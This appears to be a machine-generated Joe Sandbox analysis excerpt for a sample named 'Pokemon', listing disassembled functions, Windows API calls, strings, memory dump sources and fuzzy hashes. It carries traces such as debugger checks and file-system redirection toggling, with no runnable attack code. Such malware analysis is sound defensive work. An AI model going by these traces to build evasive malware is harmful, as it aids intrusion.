                                                                                                                                                                                                                                                                                      • String ID: Line %d: $AutoIt -
                                                                                                                                                                                                                                                                                      • API String ID: 2289894680-4094128768
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,?,OV,000C894C,?,00159CE8,0000000C,000C89AB,?,OV,?,000D564F), ref: 000C8A84
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 000C8A8E
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000C8AB9
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseErrorHandleLast__dosmaperr
                                                                                                                                                                                                                                                                                      • String ID: OV
                                                                                                                                                                                                                                                                                      • API String ID: 2583163307-383227264
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000958BE,SwapMouseButtons,00000004,?), ref: 000958EF
                                                                                                                                                                                                                                                                                      • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000958BE,SwapMouseButtons,00000004,?), ref: 00095910
                                                                                                                                                                                                                                                                                      • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,000958BE,SwapMouseButtons,00000004,?), ref: 00095932
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                      • String ID: Control Panel\Mouse
                                                                                                                                                                                                                                                                                      • API String ID: 3677997916-824357125
                                                                                                                                                                                                                                                                                      • Opcode ID: 56ab514ef0f6fb870dddf06c1e44748edb82d4a22979415a65db0c9411f1068a
                                                                                                                                                                                                                                                                                      • Instruction ID: 165e4cafa806adc87dc1bee725f3f7382aad9965846813d3efbef61a9e909102
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 56ab514ef0f6fb870dddf06c1e44748edb82d4a22979415a65db0c9411f1068a
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D4117C75510618FFEF228F65DC84DAE77B8EF01761F104419F801E7220E2319E52A764
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      • Variable must be of type 'Object'., xrefs: 000E48C6
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: Variable must be of type 'Object'.
                                                                                                                                                                                                                                                                                      • API String ID: 0-109567571
                                                                                                                                                                                                                                                                                      • Opcode ID: 99b75bc003644c82031a09ba3cd2051d5d4745683e3ea8a0e800e198a99197b9
                                                                                                                                                                                                                                                                                      • Instruction ID: 77fd6a79f80bb6d97f3f074853b292bc27bf7e261d09a61b5412f1526871e325
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99b75bc003644c82031a09ba3cd2051d5d4745683e3ea8a0e800e198a99197b9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C26971A0020ADFCF24CF98C880ABEB7F1BF09314F248569E955AB392D775AD41DB91
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 000A15F2
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                      • Opcode ID: a11d05cc1518125a36b3947c4bbf29d500b9797fdcfe54935ee21d161f9837cb
                                                                                                                                                                                                                                                                                      • Instruction ID: d4910bdb02df1afd1bb50455fe2264907fd59195f499d627af6bac5542a0c37a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a11d05cc1518125a36b3947c4bbf29d500b9797fdcfe54935ee21d161f9837cb
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C1B2BB74A08344CFCB64CF58C880A6AB7F1BF9A304F24491DE99A9B352D771ED41CB92
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 000B09D8
                                                                                                                                                                                                                                                                                        • Part of subcall function 000B3614: RaiseException.KERNEL32(?,?,?,000B09FA,?,00000000,?,?,?,?,?,?,000B09FA,00000000,00159758,00000000), ref: 000B3674
                                                                                                                                                                                                                                                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 000B09F5
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                                                                                                                                                                                      • String ID: Unknown exception
                                                                                                                                                                                                                                                                                      • API String ID: 3476068407-410509341
                                                                                                                                                                                                                                                                                      • Opcode ID: 420cae7e561288056403d2a5a96e4a817b33a2079fdc21a8eca4966eb22787e2
                                                                                                                                                                                                                                                                                      • Instruction ID: 5725552e2d63d62e6714f50f3c55fa846ea2c2d207adadcc61feaad26ab7b89f
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 420cae7e561288056403d2a5a96e4a817b33a2079fdc21a8eca4966eb22787e2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1FF0F63490060CB7DB14BAA8DC469DF77AC5F00350B608521FD24A65E3FB70EA59CAD1
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00118D52
                                                                                                                                                                                                                                                                                      • TerminateProcess.KERNEL32(00000000), ref: 00118D59
                                                                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,?), ref: 00118F3A
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      • Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Process$CurrentFreeLibraryTerminate
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 146820519-0
                                                                                                                                                                                                                                                                                      • Opcode ID: f04432e03db3e540cd97337d8451fde684ee84206e138748e6c3c40db94f0723
                                                                                                                                                                                                                                                                                      • Instruction ID: 45750e08f557151386bbaba22e24dc92b7ef0cfc4f11463544da31c0e0e587a5
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f04432e03db3e540cd97337d8451fde684ee84206e138748e6c3c40db94f0723
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5D126D719083419FC714DF28C484B9ABBE5FF85314F14896DE8899B392DB31ED85CB92
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: _wcslen$_strcat
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 306214811-0
                                                                                                                                                                                                                                                                                      • Opcode ID: c2d65f2742b7bca25298b02ee3fed6fbd5e7a25cf8269e4cf07beb1c9b55b487
                                                                                                                                                                                                                                                                                      • Instruction ID: f627ee65b9bd2de1d454cef78ec578bb63d99db0ddf335b49c49f6b400d594be
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c2d65f2742b7bca25298b02ee3fed6fbd5e7a25cf8269e4cf07beb1c9b55b487
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 84A16931604615EFCB1CDF58D5E19E9BBA1FF46314B2084ADE85A8F292DB31ED81CB80
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(0000005B,00000000), ref: 000932AF
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(00000010,00000000), ref: 000932B7
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(000000A0,00000000), ref: 000932C2
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(000000A1,00000000), ref: 000932CD
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(00000011,00000000), ref: 000932D5
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009327E: MapVirtualKeyW.USER32(00000012,00000000), ref: 000932DD
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093205: RegisterWindowMessageW.USER32(00000004,?,00092964), ref: 0009325D
                                                                                                                                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00092A0A
                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32 ref: 00092A28
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000), ref: 000D3A0D
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 1986988660-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 9e5ddfca5dd245655ef5d100a2c4d705b1c6d8561ac41a4385c3f64ed86a04e4
                                                                                                                                                                                                                                                                                      • Instruction ID: 231ba5d2a3f8b648153449e049b3d99c11ac477b1451b283311e3ac51fc766f7
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9e5ddfca5dd245655ef5d100a2c4d705b1c6d8561ac41a4385c3f64ed86a04e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2A71BEB0901A008FCBA8DF79FE696953AE4FB58344310812AE40AD7BB2EBF045C1DF55
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 000961A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00096299
                                                                                                                                                                                                                                                                                      • KillTimer.USER32(?,00000001,?,?), ref: 000AFD36
                                                                                                                                                                                                                                                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000AFD45
                                                                                                                                                                                                                                                                                      • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000EFE33
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                      • Opcode ID: dbd46a3d11bb552bf7e4e989245dbf02864330de05d6c94218b4ae5066e13571
                                                                                                                                                                                                                                                                                      • Instruction ID: fcf48cf82e930dc057e3bdf737cfc0947cee84329014c0567b9383b064840f8b
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbd46a3d11bb552bf7e4e989245dbf02864330de05d6c94218b4ae5066e13571
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4B31C571904384AFEB72CF65C845BFABBEDAB02308F0004AED599A7242C3746A85CB51
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,000C97BA,FF8BC369,00000000,00000002,00000000), ref: 000C9744
                                                                                                                                                                                                                                                                                      • GetLastError.KERNEL32(?,000C97BA,FF8BC369,00000000,00000002,00000000,?,000C5ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,000B6F41), ref: 000C974E
                                                                                                                                                                                                                                                                                      • __dosmaperr.LIBCMT ref: 000C9755
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • TranslateMessage.USER32(?), ref: 0009F27B
                                                                                                                                                                                                                                                                                      • DispatchMessageW.USER32(?), ref: 0009F289
                                                                                                                                                                                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0009F29F
                                                                                                                                                                                                                                                                                      • Sleep.KERNEL32(0000000A), ref: 0009F2B1
                                                                                                                                                                                                                                                                                      • TranslateAcceleratorW.USER32(?,?,?), ref: 000E32D8
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Message$Translate$AcceleratorDispatchPeekSleep
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • __Init_thread_footer.LIBCMT ref: 000A3006
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Init_thread_footer
                                                                                                                                                                                                                                                                                      • String ID: CALL
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetOpenFileNameW.COMDLG32(?), ref: 000D413B
                                                                                                                                                                                                                                                                                        • Part of subcall function 00095851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000955D1,?,?,000D4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00095871
                                                                                                                                                                                                                                                                                        • Part of subcall function 00093A57: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00093A76
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Name$Path$FileFullLongOpen
                                                                                                                                                                                                                                                                                      • String ID: X
APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 00093A3C
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
APIs
• IsThemeActive.UXTHEME ref: 0009333D
  • Part of subcall function 000932E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 000932FB
  • Part of subcall function 000932E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00093312
  • Part of subcall function 0009338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00093368,?), ref: 000933BB
  • Part of subcall function 0009338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00093368,?), ref: 000933CE
  • Part of subcall function 0009338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,00162418,00162400,?,?,?,?,?,?,00093368,?), ref: 0009343A
  • Part of subcall function 0009338B: SetCurrentDirectoryW.KERNEL32(?,00000001,00162418,?,?,?,?,?,?,?,00093368,?), ref: 000934BB
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 00093377
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
• String ID:
• API String ID: 1550534281-0
APIs
• timeGetTime.WINMM ref: 000AF96C
  • Part of subcall function 0009EE4C: GetInputState.USER32 ref: 0009EF07
• Sleep.KERNEL32(00000000), ref: 000EFB22
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: InputSleepStateTimetime
• String ID:
• API String ID: 4149333218-0
APIs
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: CloseHandleSleep
• String ID:
• API String ID: 252777609-0
APIs
• __Init_thread_footer.LIBCMT ref: 0009CEEE
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.000000000012D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071731712.0000000000153000.00000002.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071795560.000000000015D000.00000004.00000001.01000000.00000008.sdmp
• Associated: 0000000C.00000002.3071853296.0000000000165000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: LoadString
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • CharLowerBuffW.USER32(?,?), ref: 000FFCCE
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0009668B,?,?,000962FA,?,00000001,?,?,00000000), ref: 0009664A
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 0009665C
                                                                                                                                                                                                                                                                                        • Part of subcall function 0009663E: FreeLibrary.KERNEL32(00000000,?,?,0009668B,?,?,000962FA,?,00000001,?,?,00000000), ref: 0009666E
                                                                                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000962FA,?,00000001,?,?,00000000), ref: 000966AB
                                                                                                                                                                                                                                                                                        • Part of subcall function 00096607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,000D5657,?,?,000962FA,?,00000001,?,?,00000000), ref: 00096610
                                                                                                                                                                                                                                                                                        • Part of subcall function 00096607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00096622
                                                                                                                                                                                                                                                                                        • Part of subcall function 00096607: FreeLibrary.KERNEL32(00000000,?,?,000D5657,?,?,000962FA,?,00000001,?,?,00000000), ref: 00096635
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_12_2_90000_Pokemon.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 3347428461-0
APIs
  • Part of subcall function 000C4FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,000C319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 000C5031
• _free.LIBCMT ref: 000C53DF
Memory Dump Source
• Source File: 0000000C.00000002.3071594084.0000000000091000.00000020.00000001.01000000.00000008.sdmp, Offset: 00090000, based on PE: true
• Associated: 0000000C.00000002.3071561737.0000000000090000.00000002.00000001.01000000.00000008.sdmp
